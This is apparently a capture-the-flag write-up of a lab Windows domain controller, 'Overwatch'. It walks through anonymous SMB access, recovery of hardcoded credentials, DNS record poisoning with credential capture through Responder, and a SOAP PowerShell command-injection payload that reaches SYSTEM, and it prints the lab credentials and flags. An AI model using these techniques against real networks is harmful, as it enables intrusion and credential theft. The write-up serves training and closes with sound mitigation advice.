Difficulty: Medium | OS: Windows (Server 2022) | Release: January 2026
CVEs: None (misconfiguration chain)
Author: jkonpc | February 25, 2026
Executive Summary
Overwatch is a medium-difficulty Windows Active Directory machine featuring a .NET WCF monitoring service with hardcoded MSSQL credentials and an unsanitized PowerShell execution path. Exploitation chains through anonymous SMB share access for source code recovery, DNS record poisoning of a dead MSSQL linked server to capture cleartext credentials, and SOAP command injection in a SYSTEM-level WCF service for full domain controller compromise.
| Property | Value |
|---|
| Target IP | 10.129.244.81 |
| Open Ports | 53, 88, 135, 139, 389, 445, 3389, 5985, 6520 (MSSQL), 8000 (WCF/localhost) |
| Web Application | WCF MonitoringService (basicHttpBinding, port 8000) |
| User Flag | f70669242ab103f589db691e340cb2f5 |
| Root Flag | 187de925dc90f84f70d458bf3946a1f2 |
Attack Chain Overview
- Initial Foothold (sqlsvc): Anonymous SMB access to
software$ share → .NET binary decompilation → hardcoded MSSQL credentials (sqlsvc:TI0LKcfHzZw1Vv) - Credential Capture (sqlmgmt): MSSQL linked server
SQL07 with no DNS record → DNS A record poisoning via authenticated LDAP → Responder captures cleartext MSSQL creds (sqlmgmt:bIhBbzMMnB82yx) - User Access (sqlmgmt): WinRM shell as
sqlmgmt → user flag - Privilege Escalation (SYSTEM): SOAP command injection via WCF
KillProcess method → PowerShell execution as SYSTEM → root flag
Phase 1: Reconnaissance
Service Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| $ nmap -sC -sV 10.129.244.81
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb)
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| Product_Version: 10.0.20348
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|
A full port scan (-p-) reveals MSSQL on a non-standard port:
1
2
3
4
| $ nmap -sC -sV 10.129.244.81 -p-
6520/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
9389/tcp open mc-nmf .NET Message Framing
|
| Discovery | Detail |
|---|
| Hostname | S200401.overwatch.htb |
| Domain | overwatch.htb |
| OS | Windows Server 2022 Build 20348 |
| MSSQL | SQL Server 2022 RTM on port 6520 |
| SMB Signing | Enabled and required |
SMB Enumeration
Anonymous/Guest authentication is enabled. The anonymous user has Guest-level access and reveals a hidden share:
1
2
3
4
5
6
7
8
9
10
| $ nxc smb 10.129.244.81 -u 'anonymous' -p '' --shares
Share Permissions Remark
----- ----------- ------
ADMIN$ Remote Admin
C$ Default share
IPC$ READ Remote IPC
NETLOGON Logon server share
software$ READ
SYSVOL Logon server share
|
The software$ share contains a Monitoring directory with a .NET application:
1
2
3
4
5
6
7
8
9
10
| $ smbclient //10.129.244.81/software$ -U 'anonymous' -N -c 'cd Monitoring; ls'
EntityFramework.dll
EntityFramework.SqlServer.dll
Microsoft.Management.Infrastructure.dll
overwatch.exe 9728 Fri May 16 20:19:24 2025
overwatch.exe.config 2163 Fri May 16 20:02:30 2025
overwatch.pdb 30208 Fri May 16 20:19:24 2025
System.Data.SQLite.dll
System.Management.Automation.dll
|
Source Code Analysis
The binary is a small (9KB) .NET 4.7.2 application with a PDB — decompilation produces near-source-quality output. The accompanying DLLs reveal functionality: Entity Framework + SQLite for data access, System.Management.Automation for PowerShell execution, and WMI via Microsoft.Management.Infrastructure.
The application config (overwatch.exe.config) exposes a WCF SOAP service:
1
2
3
4
5
6
7
8
9
| <service name="MonitoringService">
<host>
<baseAddresses>
<add baseAddress="http://overwatch.htb:8000/MonitorService" />
</baseAddresses>
</host>
<endpoint address="" binding="basicHttpBinding" contract="IMonitoringService" />
<endpoint address="mex" binding="mexHttpBinding" contract="IMetadataExchange" />
</service>
|
Decompilation reveals three critical findings:
1. Hardcoded MSSQL credentials:
1
| private readonly string connectionString = "Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=TI0LKcfHzZw1Vv;";
|
2. PowerShell command injection in KillProcess:
1
2
3
4
5
6
7
| public string KillProcess(string processName)
{
string text = "Stop-Process -Name " + processName + " -Force";
// ...
val2.get_Commands().AddScript(text);
val2.get_Commands().Add("Out-String");
Collection<PSObject> collection = val2.Invoke();
|
No input sanitization — the processName parameter is concatenated directly into a PowerShell command and executed via System.Management.Automation.Runspaces.
3. SQL injection in LogEvent:
1
| SqlCommand val2 = new SqlCommand("INSERT INTO EventLog (Timestamp, EventType, Details) VALUES (GETDATE(), '" + type + "', '" + detail + "')", val);
|
String concatenation into SQL queries, though this is only exploitable server-side.
| Finding | Detail |
|---|
| WCF Endpoint | http://overwatch.htb:8000/MonitorService |
| MSSQL Credentials | sqlsvc:TI0LKcfHzZw1Vv |
| Injection Vector | KillProcess — unsanitized PowerShell execution |
| Debug Mode | includeExceptionDetailInFaults="True" |
Phase 1: Exploitation — DNS Poisoning via Linked Server
MSSQL Enumeration
The sqlsvc credentials are valid against SMB and MSSQL (port 6520), but the account has minimal SQL privileges — no sysadmin role and only CONNECT SQL and VIEW ANY DATABASE permissions:
1
2
3
4
5
| $ sqsh -S 10.129.244.81:6520 -U 'overwatch\sqlsvc' -P 'TI0LKcfHzZw1Vv'
1> SELECT IS_SRVROLEMEMBER('sysadmin')
2> go
0
|
However, a linked server is configured:
1
2
3
4
5
6
| 1> EXEC sp_linkedservers
2> go
SRV_NAME SRV_PRODUCT
S200401\SQLEXPRESS SQL Server
SQL07 SQL Server
|
Attempting to query SQL07 fails — the hostname does not resolve:
1
2
3
| 1> SELECT * FROM OPENQUERY(SQL07, 'SELECT 1')
2> go
Named Pipes Provider: Could not open a connection to SQL Server [53].
|
DNS Record Poisoning
DNS confirms SQL07.overwatch.htb returns NXDOMAIN:
1
2
| $ dig @10.129.244.81 SQL07.overwatch.htb
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN
|
By default, authenticated domain users can create new DNS A records via LDAP. Using dnstool.py from krbrelayx, a poisoned A record is added pointing SQL07 to the attacker’s IP:
1
2
| python3 krbrelayx/dnstool.py -u 'overwatch.htb\sqlsvc' -p 'TI0LKcfHzZw1Vv' \
-a add -r SQL07.overwatch.htb -d 10.10.16.23 10.129.244.81
|
1
2
| [+] Bind OK
[+] LDAP operation completed successfully
|
Credential Capture
With Responder listening on the attacker machine, the linked server query is triggered from sqsh:
1
| $ sudo responder -I tun0
|
1
2
| 1> SELECT * FROM OPENQUERY(SQL07, 'SELECT 1')
2> go
|
The MSSQL service authenticates to the attacker in cleartext:
1
2
3
4
| [MSSQL] Cleartext Client : 10.129.244.81
[MSSQL] Cleartext Hostname : SQL07 ()
[MSSQL] Cleartext Username : sqlmgmt
[MSSQL] Cleartext Password : bIhBbzMMnB82yx
|
| Credential | Value |
|---|
| Username | sqlmgmt |
| Password | bIhBbzMMnB82yx |
| Source | MSSQL linked server authentication (cleartext) |
Phase 2: User Access
WinRM Shell
The sqlmgmt account has Remote Management Users group membership:
1
2
| $ nxc winrm 10.129.244.81 -u 'sqlmgmt' -p 'bIhBbzMMnB82yx'
WINRM 10.129.244.81 5985 S200401 [+] overwatch.htb\sqlmgmt:bIhBbzMMnB82yx (Auth Success)
|
1
2
3
4
| $ evil-winrm -i 10.129.244.81 -u 'sqlmgmt' -p 'bIhBbzMMnB82yx'
*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> type user.txt
f70669242ab103f589db691e340cb2f5
|
The account has no special privileges — no SeImpersonate, no local admin membership, and only standard domain user groups:
| Attribute | Value |
|---|
| Domain Groups | Domain Users |
| Local Groups | Remote Management Users |
| Privileges | SeMachineAccountPrivilege, SeChangeNotifyPrivilege |
Phase 3: Privilege Escalation
Identifying the Vector
The WCF monitoring service is listening on port 8000 bound to all interfaces, running under PID 4 (SYSTEM):
1
2
| *Evil-WinRM* PS> netstat -ano | findstr 8000
TCP 0.0.0.0:8000 0.0.0.0:0 LISTENING 4
|
Port 8000 was not reachable externally (filtered by firewall), but is accessible from the local machine. The WSDL confirms the service is live:
1
2
| *Evil-WinRM* PS> Invoke-WebRequest -Uri "http://localhost:8000/MonitorService?wsdl" -UseBasicParsing
StatusCode: 200
|
Exploitation — SOAP Command Injection
The KillProcess method constructs the PowerShell command as:
1
| Stop-Process -Name <input> -Force
|
Injecting test; whoami # produces:
1
| Stop-Process -Name test; whoami #-Force
|
The semicolon terminates the first command, whoami executes, and # comments out the trailing -Force.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| $body = @"
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<KillProcess xmlns="http://tempuri.org/">
<processName>test; whoami #</processName>
</KillProcess>
</s:Body>
</s:Envelope>
"@
$response = Invoke-WebRequest -Uri "http://localhost:8000/MonitorService" `
-Method POST -ContentType "text/xml" -Body $body `
-Headers @{SOAPAction='"http://tempuri.org/IMonitoringService/KillProcess"'} `
-UseBasicParsing
$response.Content
|
1
| <KillProcessResult>nt authority\system</KillProcessResult>
|
Root Flag
1
| <processName>test; type C:\Users\Administrator\Desktop\root.txt #</processName>
|
1
| <KillProcessResult>187de925dc90f84f70d458bf3946a1f2</KillProcessResult>
|
Root Flag: 187de925dc90f84f70d458bf3946a1f2
Lessons Learned
Hardcoded Credentials in Distributed Binaries: The monitoring application shipped with plaintext MSSQL credentials in source code and was distributed via an SMB share accessible to anonymous users. Any attacker with network access could recover the credentials through decompilation. Service credentials should be managed through environment variables, Windows Credential Manager, or secrets management systems — never embedded in application code, especially when the binary is stored on a readable share.
Authenticated DNS Record Creation in Active Directory: By default, any authenticated domain user can create new DNS A records in AD-integrated DNS zones. This is a design feature, not a bug — but it becomes a critical attack vector when applications reference hostnames that don’t resolve. The SQL07 linked server was configured to connect to a hostname with no DNS entry, allowing any domain user to claim it. Mitigations include restricting DNS record creation via ACLs, removing stale linked server configurations, and auditing DNS zones for missing records that could be hijacked.
Cleartext MSSQL Linked Server Authentication: The linked server connection transmitted credentials in cleartext because the connection used SQL Server authentication over an unencrypted channel. When the attacker poisoned DNS to redirect the connection, Responder captured the credentials without needing to crack any hash. Linked servers should use Windows integrated authentication (Kerberos) where possible, and connections should enforce TLS encryption to prevent credential interception even if DNS is compromised.
Unsanitized Input in PowerShell Execution: The WCF KillProcess method concatenated user input directly into a PowerShell command string — a textbook command injection vulnerability. The System.Management.Automation namespace provides safe alternatives: AddCommand() with AddParameter() constructs parameterized commands that prevent injection, similar to parameterized SQL queries. The use of AddScript() with string concatenation should be treated with the same suspicion as string-concatenated SQL.
| Tool | Purpose |
|---|
| nmap | Service enumeration and full port scanning |
| netexec (nxc) | SMB, WinRM, MSSQL, and RDP authentication testing |
| smbclient | SMB share enumeration and file retrieval |
| ilspycmd | .NET binary decompilation |
| sqsh | MSSQL interactive query execution |
| dnstool.py (krbrelayx) | Active Directory DNS record poisoning via LDAP |
| Responder | NTLM/cleartext credential capture |
| evil-winrm | WinRM shell access |
| Invoke-WebRequest | SOAP endpoint interaction for command injection |
CVE Reference
| CVE | Component | Description |
|---|
| N/A | overwatch.exe | Hardcoded MSSQL credentials in .NET binary distributed via anonymous SMB share |
| N/A | AD DNS | Authenticated users can create DNS A records — enables linked server hijacking |
| N/A | MSSQL Linked Server | Cleartext SQL authentication to unresolvable hostname — credential capture via DNS poisoning |
| N/A | WCF KillProcess | PowerShell command injection via unsanitized SOAP parameter in SYSTEM-context service |